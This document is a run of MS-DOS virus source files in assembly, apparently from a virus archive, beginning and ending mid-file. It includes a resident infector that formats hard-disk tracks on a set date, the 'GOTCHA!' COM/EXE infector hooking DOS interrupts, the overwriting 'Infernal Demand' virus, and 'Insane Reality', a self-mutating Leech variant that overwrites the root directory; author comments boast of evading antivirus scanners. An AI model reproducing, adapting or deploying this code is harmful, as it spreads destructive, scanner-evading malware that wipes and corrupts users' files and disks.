mov bx,offset data_25
add bx,bp
mov ax,[bx]
mov word ptr ds:[100h],ax
add bx,2
mov al,[bx]
mov byte ptr ds:[102h],al
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ax,offset start
push ax
retn
data_9 dw 0, 0 ; Data table (indexed access)
data_11 dw 0, 0 ; Data table (indexed access)
loc_5::
mov bx,cs:data_33[bp]
mov dx,cs
sub dx,bx
mov ax,dx
add ax,cs:data_18[bp]
add dx,cs:data_20[bp]
mov bx,cs:data_17[bp]
mov word ptr cs:[216h][bp],bx
mov word ptr cs:[218h][bp],ax
mov ax,cs:data_19[bp]
mov word ptr cs:[20Ch][bp],dx
mov word ptr cs:[212h][bp],ax
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ax,0
cli ; Disable interrupts
mov ss,ax
mov sp,0
sti ; Enable interrupts
;* jmp far ptr loc_1 ;*
sub_1 endp
db 0EAh, 00h, 00h, 00h, 00h
;* No entry point to code
push ax
in al,60h ; port 60h, keybd scan or sw1
cmp al,53h ; 'S'
je loc_7 ; Jump if equal
loc_6::
pop ax
jmp dword ptr cs:data_11
loc_7::
mov ah,2Ah
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dh=month
; dl=day, al=day-of-week 0=SUN
cmp dl,18h
jne loc_6 ; Jump if not equal
mov ch,0
locloop_8::
mov ah,5
mov dh,0
mov dl,80h
int 13h ; Disk dl=drive 0 ah=func 05h
; format track=ch or cylindr=cx
; al=interleave, dh=head
inc ch
cmp ch,20h ; ' '
loopnz locloop_8 ; Loop if zf=0, cx>0
;* jmp far ptr loc_31 ;*
db 0EAh,0F0h,0FFh,0FFh,0FFh
db 0CFh
loc_9::
pushf ; Push flags
push cs
call sub_2
test al,al
jnz loc_ret_12 ; Jump if not zero
push ax
push bx
push es
mov ah,51h
int 21h ; DOS Services ah=function 51h
; get active PSP segment in bx
;* undocumented function
mov es,bx
cmp bx,es:data_1e
jne loc_11 ; Jump if not equal
mov bx,dx
mov al,[bx]
push ax
mov ah,2Fh
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
pop ax
inc al
jnz loc_10 ; Jump if not zero
add bx,7
loc_10::
mov ax,es:[bx+17h]
and ax,1Fh
xor al,1Dh
jnz loc_11 ; Jump if not zero
and byte ptr es:[bx+17h],0E0h
sub word ptr es:[bx+1Dh],3C3h
sbb es:[bx+1Fh],ax
loc_11::
pop es
pop bx
pop ax
loc_ret_12::
iret ; Interrupt return
;* No entry point to code
cmp ax,4B00h
je loc_14 ; Jump if equal
cmp ah,11h
je loc_9 ; Jump if equal
cmp ah,12h
je loc_9 ; Jump if equal
cmp ax,7BCDh
jne loc_13 ; Jump if not equal
jmp short loc_14
db 90h
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
loc_13::
jmp dword ptr cs:data_9
loc_14::
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
push es
push ds
cmp ax,7BCDh
jne loc_15 ; Jump if not equal
push cs
pop ds
mov dx,4B7h
jmp short loc_16
db 90h
loc_15::
call sub_5
jc loc_18 ; Jump if carry Set
loc_16::
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
jc loc_19 ; Jump if carry Set
test cl,1
jz loc_17 ; Jump if zero
and cl,0FEh
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_19 ; Jump if carry Set
loc_17::
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_19 ; Jump if carry Set
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
mov al,cl
or cl,1Fh
dec cx
dec cx
xor al,cl
jz loc_19 ; Jump if zero
push cs
pop ds
mov data_21,cx
mov data_22,dx
mov ah,3Fh ; '?'
mov cx,20h
mov dx,offset data_25
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
jc loc_18 ; Jump if carry Set
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_18 ; Jump if carry Set
cmp cs:data_25,5A4Dh
je loc_21 ; Jump if equal
mov cx,ax
sub cx,3
mov cs:data_24,cx
call sub_3
jc loc_18 ; Jump if carry Set
mov ah,40h ; '@'
mov dx,offset data_23
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_18::
mov cx,cs:data_21
mov dx,cs:data_22
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ah,3Eh
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_19::
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
cmp ax,7BCDh
jne loc_20 ; Jump if not equal
mov bx,ax
loc_20::
jmp dword ptr cs:data_9
loc_21::
mov cx,cs:data_32
mov cs:data_17,cx
mov cx,cs:data_33
mov cs:data_18,cx
mov cx,cs:data_31
mov cs:data_19,cx
mov cx,cs:data_30
mov cs:data_20,cx
push ax
push dx
call sub_4
sub dx,cs:data_29
mov cs:data_33,dx
mov cs:data_32,ax
pop dx
pop ax
add ax,3C3h
adc dx,0
push ax
push dx
call sub_4
sub dx,cs:data_29
add ax,40h
mov cs:data_30,dx
mov cs:data_31,ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl ; Shift w/zeros fill
mov bx,ax
mov cl,9
shr bx,cl ; Shift w/zeros fill
add dx,bx
and ax,1FFh
jz loc_22 ; Jump if zero
inc dx
loc_22::
pop cx
pop bx
mov cs:data_26,ax
mov cs:data_27,dx
call sub_3
jc loc_23 ; Jump if carry Set
mov ah,40h ; '@'
mov dx,data_2e
mov cx,20h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_23::
jmp loc_18
sub_2 endp
data_17 dw 0 ; Data table (indexed access)
data_18 dw 0 ; Data table (indexed access)
data_19 dw 0 ; Data table (indexed access)
data_20 dw 0 ; Data table (indexed access)
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_3 proc near
mov ah,40h ; '@'
mov dx,103h
mov cx,3C3h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_24 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_24 ; Jump if carry Set
clc ; Clear carry flag
retn
loc_24::
stc ; Set carry flag
retn
sub_3 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
push bx
push cx
mov cl,0Ch
shl dx,cl ; Shift w/zeros fill
mov bx,ax
mov cl,4
shr bx,cl ; Shift w/zeros fill
add dx,bx
and ax,0Fh
pop cx
pop bx
retn
sub_4 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_5 proc near
push si
push cx
mov si,dx
mov cx,128h
locloop_25::
cmp byte ptr [si],2Eh ; '.'
je loc_26 ; Jump if equal
inc si
loop locloop_25 ; Loop if cx > 0
loc_26::
cmp word ptr [si-2],544Fh
jne loc_27 ; Jump if not equal
cmp word ptr [si-4],5250h
je loc_30 ; Jump if equal
loc_27::
cmp word ptr [si-2],4E41h
jne loc_28 ; Jump if not equal
cmp word ptr [si-4],4353h
je loc_30 ; Jump if equal
loc_28::
cmp word ptr [si-2],2041h
jne loc_29 ; Jump if not equal
cmp word ptr [si-4],454Ch
je loc_30 ; Jump if equal
loc_29::
pop cx
pop si
clc ; Clear carry flag
retn
loc_30::
pop cx
pop si
stc ; Set carry flag
retn
sub_5 endp
data_21 dw 0
data_22 dw 0
data_23 db 0E9h
data_24 dw 9090h
data_25 dw 0CD90h ; Data table (indexed access)
data_26 dw 20h
data_27 dw 0
db 0, 0
data_29 dw 0
db 0, 0, 0, 0
data_30 dw 0
data_31 dw 0
db 0, 0
data_32 dw 0
data_33 dw 0 ; Data table (indexed access)
db 15 dup (0)
copyright db '(c) 1992 by Igor Ratzkopf - All '
db 'Rights Reserved July R'
seg_a ends
end start

92
MSDOS/Virus.MSDOS.Unknown.indit.asm Normal file
View File

@ -0,0 +1,92 @@
start segment
assume cs:start,ds:start
boot equ 1000h
push ax
push bx
push cx
push dx
push es
push ds
push di
push si
call cim
cim: pop bx
mov si,5aa5h
mov di,55aah
push cs
pop es
ujra: add bx,1000
cmp bx,1000
jnc kilep1
jmp kilep
kilep1: push bx
mov ax,201h
mov dx,0
mov cx,1
int 13h
pop bx
jnc tovabb
cmp ah,6
jz kilep1
jmp kilep
tovabb: cmp si,0a55ah
jz kilep
mov ax,cs
add ax,1000h
push bx
push ax
int 12h
mov bx,64
mul bx
sub ax,1000h
mov bx,ax
pop ax
cmp bx,ax
jnc oke1
pop bx
jmp kilep
oke1: pop bx
oke: mov es,ax
mov ax,cs:[bx+18h]
mov cx,cs:[bx+1ah]
mul cx
mov cx,ax
mov ax,cs:[bx+13h]
mov dx,0
div cx
sub bx,1000
push bx
mov ch,al
mov cl,1
mov bx,100h
mov dx,0
mov ax,208h
int 13h
pop bx
jc kilep
push bx
mov bx,100h
mov ax,es:[bx]
cmp ax,2452h
pop bx
jnz kilep
mov ax,bx
add ax,offset kilep-offset cim
push cs
push ax
mov ax,10ah
push es
push ax
retf
kilep: pop si
pop di
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
ret
cime: dw 0
start ends
end

571
MSDOS/Virus.MSDOS.Unknown.inf9.asm Normal file
View File

@ -0,0 +1,571 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin


164
MSDOS/Virus.MSDOS.Unknown.inferdem.asm Normal file
View File

@ -0,0 +1,164 @@
; VirusName: Infernal Demand
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 10/08/1993
;
;
; This is our (Metal Militia's) very first scratch virus. It's just
; an overwriting one. It overwrites the first 999 bytes in exe/com
; files. (Write protected/hidden files are also "infected"). This (999)
; isn't really the virus size, but the virus, is set to overwrite the
; first 999 bytes. If the programs are less then 999 bytes, the virus
; will overwrite it anyhow.
;
; When you starts this, the virus will make a file under your c:\
; which is called "Infernal.ir". The file includes a rather nice
; "poem" written by the person sitting behind the keys here..
;
; The "infected" files attributes (time/day), will be saved
; and restored, the file-size will not be hidden, but anyway..
;
; It doesn't contain any encryption nor nuking routine, but
; who cares about that for an overwriting virus?
;
; F-prot finds this is some trivial-shit, but it ain't!
; Mcafee scan v108 and S&S Toolkit's FindViru can't find this
;
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; INFERNAL DEMAND
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
cseg segment byte public
assume cs:cseg, ds:cseg
org 100h
INFERNAL proc far
start:
mov ah,19h ; get current drive
int 21h ;
push ax ;
mov ah,0Eh ;
mov dl,02h ; drive C:
int 21h
great:
mov dx,offset ExeMask ; offset 'EXEMASK'
mov ah,4Eh ; find first
int 21h ;
jnc go_for_it ; jmp if no ERROR
mov dx,offset ComMask ; offset 'COMMASK'
mov ah,4Eh ; find first
;
again: ;
int 21h ;
jc chdir ; If ERROR change directory
go_for_it:
mov ax,4300h ; Get attribute of file
mov dx,9eh ; Pointer to name in DTA
int 21h ;
push cx ; Push the attrib to stack
mov ax,4301h ; Set attribute to
xor cx,cx ; normal
int 21h ;
mov ax,3D02h ; Open file
mov dx,9eh ; Pointer to name in DTA
int 21h
jc next ; if error, get next file
xchg ax,bx ; Swap AX & BX
; so the filehandle ends up
; in BX
mov ax,5700h ; Get file date
int 21h ;
push cx ; Save file dates
push dx ;
mov dx,100h ; Write code from 100h
mov ah,40h ; to target file.
mov cx,789 ; Write XXX bytes
int 21h ;
pop dx ; Get the saved
pop cx ; filedates from the stack
mov ax,5701h ; Set them back to the file
int 21h ;
mov ah,3Eh ; Close the file
int 21h ;
pop cx ; Restore the attribs from
; the stack.
mov dx,9eh ; Pointer to name in DTA
mov ax,4301h ; Set them attributes back
int 21h ;
next:
mov ah,4Fh ; now get the next file
jmp short again ; and do it all over again
chdir:
mov ah,3ch
mov cx,0
mov dx,offset makeit
int 21h
xchg ax,bx
mov ah,40h
mov cx,meslen
mov dx,offset note
int 21h
mov ah,3eh
int 21h
mov dx,offset updir ; offset 'updir'
mov ah,3bh ; change directory
int 21h
jnc great ; jmp to great if no ERROR
exit:
pop dx ;
mov ah,0Eh ; restore org. drive
int 21h ;
retn ; return to PROMPT
ExeMask db '*.EXE',0
ComMask db '*.COM',0
Makeit db 'c:\infernal.ir',0
UpDir db '..',0
Note db 'Infernal Demand! '
db '(c) Metal Militia / Immortal Riot '
Dumpnote db ' ',0dh,0ah
db 'Your misery is our pleasure! ',0dh,0ah
db 'Your nightmare is our dream! ',0dh,0ah
db 'Your hell is our paradise! ',0dh,0ah
db 'Your lost is our demand! ',0dh,0ah
db 'Your cry is our laugh! ',0dh,0ah
db 'And your fate is ours!',0dh,0ah
Meslen equ $-note
INFERNAL endp
cseg ends
end start

601
MSDOS/Virus.MSDOS.Unknown.insane.asm Normal file
View File

@ -0,0 +1,601 @@
; VirusName : Insane Reality
; Country : Sweden
; Author : The Unforiven / Immortal Riot
; Date : 22/09/1993
;
;
; This is a mutation of the Leech virus, and well,
; havn't really changed much in this code, just
; fooled Mcafee's Scan and Dr Alans Toolkit..
;
; Okey, this might not be the very best mutation born,
; but think in this way, if this mutation is so bad
; then aren't the anti-virus products even worse ?
;
; The original virus was pretty "OK", it is a non-over-
; writing resident .COM. It will infect the program
; after you have started it. It will not infect renamed
; exe files. (..It looks at the victim's fileheader..)
;
; When the virus is in memory a infected files attributes
; (..size/date/time..) will not be discovored. If you boot
; your computer, and throw the virus out from memory,
; you'll see that the file has been changed. If an
; infected file is being run again, the virus will
; replace the infected file with its old file-attributes.
;
; This virus was originally written in Bulgaria..
; (..where else..) and I would like to thank the
; scratch coder of this little babe very much...
;
; Really hope this file will annoy some folks around,
; cuz it certainly annoyed me!..<no more comments>...
;
; Mcafee's Scan v108 can't find this, and neither can
; S&S Toolkit 6.54. Havn't tried with Tbscan/F-prot,
; but they will probably identify this as the leech virus.
;
; Beware of the Insane Reality we're living in!
; Signed The Unforgiven / Immortal Riot
.model tiny
.code
org 0
; ÄÄ---Ä-ÄÄÄÄÄ--Ä-ÄÄÄÄÄ--ÄÄÄÄ-Ä-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄ-ÄÄ-
; Disassembly by Dark Angel of Phalcon/Skism
; Assemble with Tasm /m Insane.asm, then link
; and use exe2bin for make this into a .com..
; Ä-ÄÄÄ-ÄÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄ--ÄÄ-
virlength = (readbuffer - leech)
reslength = (((encrypted_file - leech + 15) / 16) + 2)
leech:
jmp short enter_leech
filesize dw offset carrier
oldint21 dw 0, 0
oldint13 dw 0, 0
oldint24 dw 0, 0
datestore dw 0
timestore dw 0
runningflag db 1
evenodd dw 0
enter_leech:
call next
next:
pop si
db 0 ; Scan-fooler..
mutatearea1:
cli ; prevent all interupts
push ds ; Why?
pop es
mov bp,sp ; save sp
mov sp,si ; sp = offset next
add sp,encrypt_value1 - 1 - next
mutatearea2:
mov cx,ss ; save ss
mov ax,cs
mov ss,ax ; ss = PSP
pop bx ; get encryption value
dec sp
dec sp
add si,startencrypt - next
nop
decrypt:
mutatearea3:
pop ax
xor al,bh ; decrypt away!
push ax
dec sp
cmp sp,si
jae decrypt
startencrypt:
mov ax,es
dec ax
mov ds,ax ; ds->MCB
db 81h,6,3,0 ;add word ptr ds:[3],-reslength
dw 0 - reslength
mov bx,ds:[3] ; bx = memory size
mov byte ptr ds:[0],'Z' ; mark end of chain
inc ax ; ax->PSP
inc bx
add bx,ax ; bx->high area
mov es,bx ; as does es
mov ss,cx ; restore ss
add si,leech - startencrypt
mov bx,ds ; save MCB segment
mov ds,ax
mov sp,bp ; restore sp
push si
xor di,di
mov cx,virlength ; 1024 bytes
cld
rep movsb
pop si
push bx
mov bx,offset highentry
push es
push bx
retf ; jmp to highentry in
; high memory
highentry:
mov es,ax ; es->PSP
mov ax,cs:filesize
add ax,100h ; find stored area
mov di,si
mov si,ax
mov cx,virlength
rep movsb ; and restore over virus code
pop es ; MCB
xor ax,ax
mov ds,ax ; ds -> interrupt table
sti
cmp word ptr ds:21h*4,offset int21 ; already resident?
jne go_resident
db 26h,81h,2eh,3,0 ;sub word ptr es:[3],-reslength
dw 0 - reslength ;alter memory size
test byte ptr ds:[46Ch],0E7h ;1.17% chance of activation
jnz exit_virus
push cs
pop ds
mov si,offset message ; "Insane Reality.."
display_loop: ; display ASCIIZ string
lodsb ; get next character
or al,0 ; exit if 0
jz exit_display_loop
mov ah,0Eh ; otherwise write character
int 10h
jmp short display_loop
exit_display_loop:
mov ah,32h ; Get DPB -> DS:BX
xor dl,dl
int 21h
jc exit_virus ; exit on error
call getint13and24
call setint13and24
mov dx,[bx+10h] ; first sector of root
; directory
; BUG: won't work in DOS 4+
mov ah,19h ; default drive -> al
int 21h
mov cx,2 ; Overwrite root directory
int 26h ; Direct write..
pop bx
call setint13and24 ; restore int handlers
exit_virus:
jmp returnCOM
go_resident:
db 26h, 81h, 6, 12h, 0 ;add word ptr es:12h,-reslength
dw 0 - reslength ;alter top of memory in PSP
mov bx,ds:46Ch ;BX = random #
push ds
push cs
pop ds
push cs
pop es
mov runningflag,1 ; reset flag
and bh,80h
mov nothing1,bh
mutate1:
test bl,1
jnz mutate2
mov si,offset mutatearea1
add si,evenodd
lodsb
xchg al,[si] ; swap instructions
mov [si-1],al
mutate2:
test bl,2
jnz mutate3
mov si,offset mutatearea2
add si,evenodd
lodsw
xchg ax,[si] ; swap instructions
mov [si-2],ax
mutate3:
test bl,4
jnz mutate4
mov si,offset mutatearea3
mov al,2
xor [si],al ; flip between ax & dx
xor [si+2],al
xor [si+3],al
mutate4:
test bl,8
jnz findint21
mov si,offset next
mov di,offset readbuffer
mov cx,offset enter_leech
push si
push di
lodsb
cmp al,5Eh ; 1 byte pop si?
je now_single_byte_encode
inc si ; skip second byte of two
; byte encoding of pop si
now_single_byte_encode:
push cx
rep movsb
pop cx
pop si
pop di
cmp al,5Eh ; 1 byte pop si?
